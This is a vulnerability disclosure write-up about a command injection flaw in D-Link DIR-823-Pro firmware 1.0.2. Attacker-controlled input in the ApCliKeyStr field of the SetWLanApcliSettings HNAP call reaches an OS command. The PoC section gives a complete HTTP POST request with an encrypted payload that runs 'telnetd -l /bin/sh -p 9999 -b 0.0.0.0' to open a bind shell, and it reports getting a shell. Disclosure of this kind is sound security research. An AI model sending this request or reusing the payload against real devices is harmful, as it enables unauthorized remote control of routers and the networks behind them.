# D-Link Vulnerability

Vendor:D-Link

Product:DIR-823-Pro

Version:1.0.2(Download Link:http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-823+Pro)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn



## Vulnerability description

We found an Command Injection vulnerability  in D-Link router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `prog.cgi` binary:

In `SetWLanApcliSettings` function, `ApCliKeyStr` is directly passed by the attacker, so we can control the `ApCliKeyStr` to attack the OS.

<div  align="center"><img src="./images/1.png" style="zoom:80%;" /></div>

As you can see here, the initial input will be extracted and cause command injection.

<div  align="center"><img src="./images/2.png" style="zoom:80%;" /></div>

But in the function, some processing is done to the string. Because this field represents the password, we guess that the designer encrypted and decrypted the password in order to ensure the security of the password transmission.

<div  align="center"><img src="./images/3.png" style="zoom:80%;" /></div>

The encryption operation corresponding to the front end.

<div  align="center"><img src="./images/4.png" style="zoom:80%;" /></div>

So we just need to replace the password with the command injected into the OS.

> The same problem exists in the `SetWLanRepeaterPwSettings` function.

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.What’s more interesting is that in the front-end interface, the user’s input is not checked either.

<div  align="center"><img src="./images/5.png" style="zoom:80%;" /></div>



## PoC

We set `ApCliKeyStr` as **`telnetd -l /bin/sh -p 9999 -b 0.0.0.0`** , and the router will excute it,such as:

```http
POST /HNAP1/ HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetWLanApcliSettings"
HNAP_AUTH: 674A57D04AAA475C9CA52AF24F7D8CE1 1642557658825
Content-Length: 360
Origin: http://192.168.100.1
Connection: close
Referer: http://192.168.100.1/WorkMode.html
Cookie: work_mode=repeater; uid=9sNZ4AnO; PrivateKey=8409363D58D801179D49E9EC0E2A52F7; timeout=63

{"SetWLanApcliSettings":{"ApCliSsid":"TOTOLINK_X5000R","ApCliBssid":"5c:92:5e:9b:ec:e0","ApCliChannel":"1","ApCliAuthMode":"WEP","ApCliEncrypType":"AES","wl(0).(0)_bw":"1","ApCliKeyStr":"697a97ee0543e2d17a52ed8ffdff9d4b62c270c69d5140a44952583126dafd4bac9b1e68383b00d75ee5adf0ab12efce5f611e686a3b00275ee505f0ab017cce","wl(0).(0)_ssid_hidden":"0","Mode":"2.4G"}}
```

<div  align="center"><img src="./images/6.png" style="zoom:80%;" /></div>



## Result

Get a shell!

<div  align="center"><img src="./images/7.png" style="zoom:80%;" /></div>
